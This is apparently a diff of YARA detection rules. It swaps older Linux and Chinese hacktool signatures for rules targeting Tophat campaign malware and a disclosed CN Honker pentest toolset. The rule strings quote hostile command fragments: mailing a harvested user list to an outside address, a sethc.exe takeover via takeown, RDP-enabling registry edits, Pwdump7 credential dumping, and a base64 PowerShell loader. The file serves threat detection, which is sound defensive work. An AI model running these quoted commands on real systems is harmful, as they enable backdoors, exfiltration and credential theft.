+		hash2 = "1f9bca1d5ce5d14d478d32f105b3ab5d15e1c520bde5dfca22324262e84d4eaf"
 
 	strings:
-		$s0 = "cat trueusers.txt | mail -s \"eyes\" clubby@slucia.com" fullword ascii
-		$s1 = "mv scan.log bios.txt" fullword ascii
-		$s2 = "rm -rf bios.txt" fullword ascii
-		$s3 = "echo -e \"# by Eyes.\"" fullword ascii
-		$s4 = "././pscan2 $1 22" fullword ascii
-		$s10 = "echo \"#cautam...\"" fullword ascii
+		$s1 = "WINMGMTS:\\\\.\\ROOT\\CIMV2" fullword ascii
+		$s2 = "UENCRYPTION" fullword ascii
+		$s3 = "TEXPORTAPIS" fullword ascii
+		$s4 = "tcustommemorystream" fullword ascii
+		$s5 = "tmemorystream" fullword ascii
+		$s6 = "ExtrasNoteCONSOLEemb" fullword ascii
+		$s7 = "DIALOG INCLUDE" fullword ascii
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( pe.imphash ( ) == "c221006b240b1c993217bd61e5ee31b6" or 6 of them )
 }
-rule SIGNATURE_BASE_Linuxhacktool_Eyes_Mass
+
+rule SIGNATURE_BASE_Tophat_Malware_Jan18_2 : FILE
 {
 	meta:
-		description = "Linux hack tools - file mass"
+		description = "Auto-generated rule - file e.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5da0c474-2dc8-5580-bf5c-d3f464225e4c"
-		date = "2015-01-19"
-		modified = "2025-04-14"
-		reference = "not set"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2889-L2906"
+		id = "a1b8e477-df8a-5ff4-9108-541a0f082f77"
+		date = "2018-01-29"
+		modified = "2023-01-06"
+		reference = "https://researchcenter.paloaltonetworks.com/2018/01/unit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services/#appendix"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_tophat.yar#L38-L60"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "2054cb427daaca9e267b252307dad03830475f15"
-		logic_hash = "5bf17d1a8ae78681d2c3cba8511019ddf85e6d7a242900b56848521eef40ffc6"
+		logic_hash = "2321e89559363c04ef0e92a9c9e03d11ff27410103b3aaba954b544e33961b2f"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "9580d15a06cd59c01c59bca81fa0ca8229f410b264a38538453f7d97bfb315e7"
 
 	strings:
-		$s0 = "cat trueusers.txt | mail -s \"eyes\" clubby@slucia.com" fullword ascii
-		$s1 = "echo -e \"${BLU}Private Scanner By Raphaello , DeMMoNN , tzepelush & DraC\\n\\r" ascii
-		$s3 = "killall -9 pscan2" fullword ascii
-		$s5 = "echo \"[*] ${DCYN}Gata esti h4x0r ;-)${RES}  [*]\"" fullword ascii
-		$s6 = "echo -e \"${DCYN}@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#${RES}\"" fullword ascii
+		$s1 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontSubstitutes" fullword ascii
+		$s2 = "\\SYSTEM\\CurrentControlSet\\Control\\Keyboard Layouts\\" ascii
+		$s3 = "LError loading dock zone from the stream. Expecting version %d, but found %d." fullword wide
+		$s4 = "WINMGMTS:\\\\.\\ROOT\\CIMV2" fullword ascii
+		$s5 = "UENCRYPTION" fullword ascii
+		$s6 = "TEXPORTAPIS" fullword ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( pe.imphash ( ) == "f98cebcae832abc3c46e6e296aecfc03" and 5 of them )
 }
-rule SIGNATURE_BASE_Linuxhacktool_Eyes_Pscan2_2
+rule SIGNATURE_BASE_Tophat_BAT : FILE
 {
 	meta:
-		description = "Linux hack tools - file pscan2.c"
+		description = "Auto-generated rule - file cgen.bat"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3950b235-70bc-5afd-add5-38c50055b28b"
-		date = "2015-01-19"
-		modified = "2025-04-14"
-		reference = "not set"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2908-L2925"
+		id = "81e84f1b-0ee7-530d-91ea-645c0994e68f"
+		date = "2018-01-29"
+		modified = "2023-12-05"
+		reference = "https://researchcenter.paloaltonetworks.com/2018/01/unit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services/#appendix"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_tophat.yar#L62-L78"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "eb024dfb441471af7520215807c34d105efa5fd8"
-		logic_hash = "981514cf0887a1a7cb55fe9ed9dadd48adbf0f033e527b357e90e052a4c2d251"
+		logic_hash = "5dc58fa39d8b2aed95b39da575191fe5d10d5dd95b57c320cde8983505e7184f"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "f998271c4140caad13f0674a192093092e2a9f7794a7fbbdaa73ae8f2496c387"
+		hash2 = "0fbc6fd653b971c8677aa17ecd2749200a4a563f9dd5409cfb26d320618db3e2"
 
 	strings:
-		$s0 = "snprintf(outfile, sizeof(outfile) - 1, \"scan.log\", argv[1], argv[2]);" fullword ascii
-		$s2 = "printf(\"Usage: %s <b-block> <port> [c-block]\\n\", argv[0]);" fullword ascii
-		$s3 = "printf(\"\\n# pscan completed in %u seconds. (found %d ips)\\n\", (time(0) - sca" ascii
-		$s19 = "connlist[i].addr.sin_family = AF_INET;" fullword ascii
-		$s20 = "snprintf(last, sizeof(last) - 1, \"%s.%d.* (total: %d) (%.1f%% done)\"," fullword ascii
+		$s1 = "= New-Object IO.MemoryStream(,[Convert]::FromBase64String(\"" ascii
+		$s2 = "goto Start" fullword ascii
+		$s3 = ":Start" fullword ascii
 
 	condition:
-		2 of them
+		filesize < 5KB and all of them
 }
-rule SIGNATURE_BASE_CN_Portscan : APT FILE
+rule SIGNATURE_BASE_CN_Honker_Mafix_Root : FILE
 {
 	meta:
-		description = "CN Port Scanner"
+		description = "Script from disclosed CN Honker Pentest Toolset - file root"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fb52a89a-2270-5170-9874-9278a0177454"
-		date = "2013-11-29"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2927-L2941"
+		id = "ae08b2e9-4d81-5f15-88d2-e2ace20626bf"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_scripts.yar#L8-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e1b745bd321527cee3eb203847d00c9eda4a7b1e498cb8f0ad6b588f87221759"
+		hash = "826778ef9c22177d41698b467586604e001fed19"
+		logic_hash = "db54561ba4b9c1bd4d9b183658b98f6fd3165b05c8d6d7f006ae3b5fc96ba549"
 		score = 70
 		quality = 85
-		tags = "APT, FILE"
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		confidential = false
 
 	strings:
-		$s2 = "TCP 12.12.12.12"
+		$s0 = "echo \"# vbox (voice box) getty\" >> /tmp/.init1" fullword ascii
+		$s1 = "cp /var/log/tcp.log $HOMEDIR/.owned/bex2/snifflog" fullword ascii
+		$s2 = "if [ -f /sbin/xlogin ]; then" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $s2
+		filesize < 96KB and all of them
 }
-rule SIGNATURE_BASE_WMI_Vbs : APT
+rule SIGNATURE_BASE_CN_Honker_Passwd_Dict_3389 : FILE
 {
 	meta:
-		description = "WMI Tool - APT"
+		description = "Script from disclosed CN Honker Pentest Toolset - file 3389.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b367306a-38d8-5f4d-8f09-2bf025831f0a"
-		date = "2013-11-29"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2943-L2957"
+		id = "9418f0e5-7bf0-5df3-8857-dea90fae5a54"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_scripts.yar#L26-L46"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "94163981c1a80838d1bea1b21f713f1d8fbdac8704319d1a145f0b4f6d8ff3f6"
+		hash = "2897e909e48a9f56ce762244c3a3e9319e12362f"
+		logic_hash = "2be79fc7388ca12f06577e689944bcfa72ed1e1b6da5a7fa15c8da69a4555a9a"
 		score = 70
 		quality = 85
-		tags = "APT"
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		confidential = false
 
 	strings:
-		$s3 = "WScript.Echo \"   $$\\      $$\\ $$\\      $$\\ $$$$$$\\ $$$$$$$$\\ $$\\   $$\\ $$$$$$$$\\  $$$$$$"
+		$s0 = "654321" fullword ascii
+		$s1 = "admin123" fullword ascii
+		$s2 = "admin123456" fullword ascii
+		$s3 = "administrator" fullword ascii
+		$s4 = "passwd" fullword ascii
+		$s5 = "password" fullword ascii
+		$s7 = "12345678" fullword ascii
 
 	condition:
-		all of them
+		filesize < 1KB and all of them
 }
-rule SIGNATURE_BASE_CN_Toolset__Xscanlib_Xscanlib_Xscanlib
+rule SIGNATURE_BASE_CN_Honker_Perl_Serv_U : FILE
 {
 	meta:
-		description = "Detects a Chinese hacktool from a disclosed toolset - from files XScanLib.dll, XScanLib.dll, XScanLib.dll"
+		description = "Script from disclosed CN Honker Pentest Toolset - file Perl-serv-U.pl"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c32415f4-044c-50ef-9c4c-b9327cbcef69"
-		date = "2015-03-30"
-		modified = "2025-04-14"
-		reference = "http://qiannao.com/ls/905300366/33834c0c/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2959-L2980"
+		id = "d793227d-dd4d-5c92-bfdc-9662c3ed8933"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_scripts.yar#L48-L63"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f7f66f1f3ca05e60ac850fbb94c471f664d2dc8a60c09b18686c9f2937296697"
+		hash = "f333c597ff746ebd5a641fbc248497d61e3ec17b"
+		logic_hash = "deb4ee54f9127bc093f96f7dbf3633fbfc3f66358c76fb15928dabbbffdd4963"
 		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "af419603ac28257134e39683419966ab3d600ed2"
-		hash1 = "c5cb4f75cf241f5a9aea324783193433a42a13b0"
-		hash2 = "135f6a28e958c8f6a275d8677cfa7cb502c8a822"
 
 	strings:
-		$s1 = "Plug-in thread causes an exception, failed to alert user." fullword
-		$s2 = "PlugGetUdpPort" fullword
-		$s3 = "XScanLib.dll" fullword
-		$s4 = "PlugGetTcpPort" fullword
-		$s11 = "PlugGetVulnNum" fullword
+		$s1 = "$dir = 'C:\\\\WINNT\\\\System32\\\\';" fullword ascii
+		$s2 = "$sock = IO::Socket::INET->new(\"127.0.0.1:$adminport\") || die \"fail\";" fullword ascii
 
 	condition:
-		all of them
+		filesize < 8KB and all of them
 }
-rule SIGNATURE_BASE_CN_Toolset_Ntscan_Pipecmd
+rule SIGNATURE_BASE_CN_Honker_F4Ck_Team_F4Ck : FILE
 {
 	meta:
-		description = "Detects a Chinese hacktool from a disclosed toolset - file PipeCmd.exe"
+		description = "Script from disclosed CN Honker Pentest Toolset - file f4ck.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "056ee42d-23f4-5b03-b240-392bc92b90b0"
-		date = "2015-03-30"
-		modified = "2025-04-14"
-		reference = "http://qiannao.com/ls/905300366/33834c0c/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2982-L3006"
+		id = "abf2f277-79b4-5ca2-b12e-93a662e5d607"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_scripts.yar#L65-L81"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a931d65de66e1468fe2362f7f2e0ee546f225c4e"
-		logic_hash = "2dab5a4de2abeff5659aa90fbc82bef359937ca9e45e8805b509baeb16943531"
+		hash = "e216f4ba3a07de5cdbb12acc038cd8156618759e"
+		logic_hash = "be4817bcaae952eb13c35dd89606ec733c682b2e197054bb348c3934012bd105"
 		score = 70
-		quality = 60
-		tags = ""
+		quality = 85
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "Please Use NTCmd.exe Run This Program." fullword ascii
-		$s3 = "PipeCmd.exe" fullword wide
-		$s4 = "\\\\.\\pipe\\%s%s%d" fullword ascii
-		$s5 = "%s\\pipe\\%s%s%d" fullword ascii
-		$s6 = "%s\\ADMIN$\\System32\\%s%s" fullword ascii
-		$s7 = "%s\\ADMIN$\\System32\\%s" fullword ascii
-		$s9 = "PipeCmdSrv.exe" fullword ascii
-		$s10 = "This is a service executable! Couldn't start directly." fullword ascii
-		$s13 = "\\\\.\\pipe\\PipeCmd_communicaton" fullword ascii
-		$s14 = "PIPECMDSRV" fullword wide
-		$s15 = "PipeCmd Service" fullword ascii
+		$s0 = "PassWord:F4ckTeam!@#" fullword ascii
+		$s1 = "UserName:F4ck" fullword ascii
+		$s2 = "F4ck Team" fullword ascii
 
 	condition:
-		4 of them
+		filesize < 1KB and all of them
 }
-rule SIGNATURE_BASE_CN_Toolset_Lscanportss_2
+rule SIGNATURE_BASE_CN_Honker_Sig_3389_3389 : FILE
 {
 	meta:
-		description = "Detects a Chinese hacktool from a disclosed toolset - file LScanPortss.exe"
+		description = "Script from disclosed CN Honker Pentest Toolset - file 3389.vbs"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0a796585-5fc8-5b55-acfc-3fe87308b681"
-		date = "2015-03-30"
-		modified = "2025-04-14"
-		reference = "http://qiannao.com/ls/905300366/33834c0c/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3008-L3028"
+		id = "6d385820-befe-5e2b-8c48-ad90564d5f42"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_scripts.yar#L83-L97"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "4631ec57756466072d83d49fbc14105e230631a0"
-		logic_hash = "aeecdbef3fe6d66a209df10b44046783e53ef12f67c6877309cb219db4354733"
+		hash = "f92b74f41a2138cc05c6b6993bcc86c706017e49"
+		logic_hash = "32603edd3f188a9f4919795df04112883d7b88da46b13fcd0b0e0065fd4c016b"
 		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "LScanPort.EXE" fullword wide
-		$s3 = "www.honker8.com" fullword wide
-		$s4 = "DefaultPort.lst" fullword ascii
-		$s5 = "Scan over.Used %dms!" fullword ascii
-		$s6 = "www.hf110.com" fullword wide
-		$s15 = "LScanPort Microsoft " fullword wide
-		$s18 = "L-ScanPort2.0 CooFly" fullword wide
+		$s1 = "success = obj.run(\"cmd /c takeown /f %SystemRoot%\\system32\\sethc.exe&echo y| " ascii
 
 	condition:
-		4 of them
+		filesize < 10KB and all of them
 }
-rule SIGNATURE_BASE_CN_Toolset_Sig_1433_135_Sqlr
+rule SIGNATURE_BASE_CN_Honker_Sig_3389_3389_2 : FILE
 {
 	meta:
-		description = "Detects a Chinese hacktool from a disclosed toolset - file sqlr.exe"
+		description = "Script from disclosed CN Honker Pentest Toolset - file 3389.bat"
 		author = "Florian Roth (Nextron Systems)"
-		id = "74038975-ef06-53d6-bdcc-02706408b596"
-		date = "2015-03-30"
-		modified = "2025-04-14"
-		reference = "http://qiannao.com/ls/905300366/33834c0c/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3030-L3047"
+		id = "f449f632-3102-5e62-b790-5546698dd663"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_scripts.yar#L99-L114"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "8542c7fb8291b02db54d2dc58cd608e612bfdc57"
-		logic_hash = "14c9d104cfb71a2d3545bfb6274e3a282d4597f38057187d76adaf26fe2718fa"
+		hash = "5ff92f39ade12f8ba6cb75dfdc9bb907e49f0ebd"
+		logic_hash = "637b3368fac624ca78d2f573b8b937b6b265426d7ed923f3a3d06039663c97ad"
 		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Connect to %s MSSQL server success. Type Command at Prompt." fullword ascii
-		$s11 = ";DATABASE=master" fullword ascii
-		$s12 = "xp_cmdshell '" fullword ascii
-		$s14 = "SELECT * FROM OPENROWSET('SQLOLEDB','Trusted_Connection=Yes;Data Source=myserver" ascii
+		$s1 = "@del c:\\termsrvhack.dll" fullword ascii
+		$s2 = "@del c:\\3389.txt" fullword ascii
 
 	condition:
-		all of them
+		filesize < 3KB and all of them
 }
-rule SIGNATURE_BASE_Vssown_VBS
+rule SIGNATURE_BASE_CN_Honker_Injection_Transit_Jmcook : FILE
 {
 	meta:
-		description = "Detects VSSown.vbs script - used to export shadow copy elements like NTDS to take away and crack elsewhere"
+		description = "Script from disclosed CN Honker Pentest Toolset - file jmCook.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ffbb5faf-3522-50dc-a568-503074ac0636"
-		date = "2015-10-01"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3065-L3082"
+		id = "468abb0e-a163-5fc5-b6a1-896fc04b8570"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_scripts.yar#L116-L131"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f49e9d7a07d591330e16fc539bd98d019b47dd8579d0f1ad92fa987790e64189"
-		score = 75
-		quality = 85
-		tags = ""
+		hash = "5e1851c77ce922e682333a3cb83b8506e1d7395d"
+		logic_hash = "f7a9aca65b92d4b9c787d83a421b54a23844fa8e061c6c627ddde8ab5b7f4396"
+		score = 70
+		quality = 83
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Select * from Win32_Service Where Name ='VSS'" ascii
-		$s1 = "Select * From Win32_ShadowCopy" ascii
-		$s2 = "cmd /C mklink /D " ascii
-		$s3 = "ClientAccessible" ascii
-		$s4 = "WScript.Shell" ascii
-		$s5 = "Win32_Process" ascii
+		$s1 = ".Open \"POST\",PostUrl,False" fullword ascii
+		$s2 = "JmdcwName=request(\"jmdcw\")" fullword ascii
 
 	condition:
-		all of them
+		filesize < 9KB and all of them
 }
-rule SIGNATURE_BASE_Netview_Hacktool : FILE
+rule SIGNATURE_BASE_CN_Honker_Pwdump7_Pwdump7 : FILE
 {
 	meta:
-		description = "Network domain enumeration tool - often used by attackers - file Nv.exe"
+		description = "Script from disclosed CN Honker Pentest Toolset - file Pwdump7.bat"
 		author = "Florian Roth (Nextron Systems)"
-		id = "087e2fd7-726e-5c6b-ba99-e20dd3337d6a"
-		date = "2016-03-07"
-		modified = "2025-04-14"
-		reference = "https://github.com/mubix/netview"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3084-L3107"
+		id = "baf6ced6-4298-5453-a020-a384c923584c"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_scripts.yar#L133-L147"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "52cec98839c3b7d9608c865cfebc904b4feae0bada058c2e8cdbd561cfa1420a"
-		logic_hash = "dc27d2358937d736823891c9d5c3f41f83a6f4e72d35fae0983435effda2141a"
-		score = 60
+		hash = "67d0e215c96370dcdc681bb2638703c2eeea188a"
+		logic_hash = "50e4ec9716b4e9d824fb301bb493dcdcd9782d87c0fb8040b82a87faf56292cb"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "[+] %ws - Target user found - %s\\%s" fullword wide
-		$s2 = "[*] -g used without group specified - using \"Domain Admins\"" fullword ascii
-		$s3 = "[*] -i used without interval specified - ignoring" fullword ascii
-		$s4 = "[+] %ws - Session - %s from %s - Active: %d - Idle: %d" fullword wide
-		$s5 = "[+] %ws - Backup Domain Controller" fullword wide
-		$s6 = "[-] %ls - Share - Error: %ld" fullword wide
-		$s7 = "[-] %ls - Session - Error: %ld" fullword wide
-		$s8 = "[+] %s - OS Version - %d.%d" fullword ascii
-		$s9 = "Enumerating Logged-on Users" fullword ascii
-		$s10 = ": Specifies a domain to pull a list of hosts from" fullword ascii
+		$s1 = "Pwdump7.exe >pass.txt" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 500KB and 2 of them ) or 3 of them
+		filesize < 1KB and all of them
 }
-rule SIGNATURE_BASE_Netview_Hacktool_Output
+rule SIGNATURE_BASE_CN_Honker_Portrecall_Pr : FILE
 {
 	meta:
-		description = "Network domain enumeration tool output - often used by attackers - file filename.txt"
+		description = "Script from disclosed CN Honker Pentest Toolset - file pr"
 		author = "Florian Roth (Nextron Systems)"
-		id = "259db870-6293-5a55-b56a-f981c060c18f"
-		date = "2016-03-07"
-		modified = "2025-04-14"
-		reference = "https://github.com/mubix/netview"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3109-L3124"
+		id = "1e137ed0-3af6-5b01-a27b-87bf42359887"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_scripts.yar#L149-L165"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "38a51e583b1485bdb29400cb9d0a73ec4d5387675779f949572d2b4d74da4230"
-		score = 60
+		hash = "583cf6dc2304121d835f2879803a22fea76930f3"
+		logic_hash = "f33373e87887506651b1fac464f860a3cf18ad681ba124b606524f6f2255e693"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "[*] Using interval:" fullword
-		$s2 = "[*] Using jitter:" fullword
-		$s3 = "[+] Number of hosts:" fullword
+		$s1 = "Usage: Same as lcx.exe in win32 :)" fullword ascii
+		$s2 = "connect to client" fullword ascii
+		$s3 = "PR(Packet redirection) for linux " fullword ascii
 
 	condition:
-		2 of them
+		filesize < 70KB and all of them
 }
-rule SIGNATURE_BASE_Psattack_EXE : FILE
+rule SIGNATURE_BASE_CN_Honker_Sig_3389_3389_3 : FILE
 {
 	meta:
-		description = "PSAttack - Powershell attack tool - file PSAttack.exe"
+		description = "Script from disclosed CN Honker Pentest Toolset - file 3389.bat"
 		author = "Florian Roth (Nextron Systems)"
-		id = "87f7956a-f607-5e14-a940-5080499cf682"
-		date = "2016-03-09"
-		modified = "2023-01-06"
-		reference = "https://github.com/gdssecurity/PSAttack/releases/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3135-L3155"
+		id = "ff61a5cb-6089-5632-a65d-09f4ffd99857"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_scripts.yar#L167-L183"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ad05d75640c850ee7eeee26422ba4f157be10a4e2d6dc6eaa19497d64cf23715"
-		logic_hash = "b73566eb6370fbe68f0477d1179e5d6c19fb9be2c29f63d560c42adcdf19fe58"
-		score = 100
-		quality = 60
+		hash = "cfedec7bd327897694f83501d76063fe16b13450"
+		logic_hash = "df07958e44c7896bc7bdf2b79bc95969593eb21b9c9ed51213fd15affb731ec2"
+		score = 70
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "\\Release\\PSAttack.pdb"
-		$s1 = "set-executionpolicy bypass -Scope process -Force" fullword wide
-		$s2 = "PSAttack.Modules." ascii
-		$s3 = "PSAttack.PSAttackProcessing" fullword ascii
-		$s4 = "PSAttack.Modules.key.txt" fullword wide
+		$s1 = "echo \"fDenyTSConnections\"=dword:00000000>>3389.reg " fullword ascii
+		$s2 = "echo \"PortNumber\"=dword:00000d3d>>3389.reg " fullword ascii
+		$s3 = "echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server]>>" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and ( $x1 or 2 of ( $s* ) ) ) or 3 of them
+		filesize < 2KB and all of them
 }
-rule SIGNATURE_BASE_Powershell_Attack_Scripts
+rule SIGNATURE_BASE_CN_Honker_Alien_D : FILE
 {
 	meta:
-		description = "Powershell Attack Scripts"
+		description = "Script from disclosed CN Honker Pentest Toolset - file D.ASP"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e8c4a672-229b-56c8-811b-071ae9ff341e"
-		date = "2016-03-09"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3157-L3172"
+		id = "88529577-0dea-5aa8-b763-79a69397ddd5"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_scripts.yar#L185-L203"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "42a52de089ee00e229499fea23b8acd0b7c881a9c578671aea180c0c018a54e0"
+		hash = "de9cd4bd72b1384b182d58621f51815a77a5f07d"
+		logic_hash = "2eca697dd1f2ad80c5cd71507cd5f8abd2364b11dfe3206a1043e3d4f5835797"
 		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "PowershellMafia\\Invoke-Shellcode.ps1" ascii
-		$s2 = "Nishang\\Do-Exfiltration.ps1" ascii
